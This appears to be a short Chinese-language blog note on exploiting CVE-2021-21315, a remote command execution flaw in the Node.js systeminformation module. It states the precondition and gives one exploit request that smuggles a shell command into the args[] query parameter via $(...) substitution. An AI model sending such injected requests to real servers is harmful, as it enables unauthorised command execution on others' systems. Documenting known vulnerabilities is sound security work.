【笔记】CVE-2021-21315漏洞利用

发表于 更新于 阅读次数:

前言

JS的Nodejs框架远程命令执行漏洞利用

漏洞利用前提

  • 代码中使用了systeminformation模块来执行Shell命令

exp

  • 直接将请求参数改为远程执行的Shell命令

<shell>:远程执行的Shell命令

request
1
GET http://example.com?args[]=$(<shell>)

完成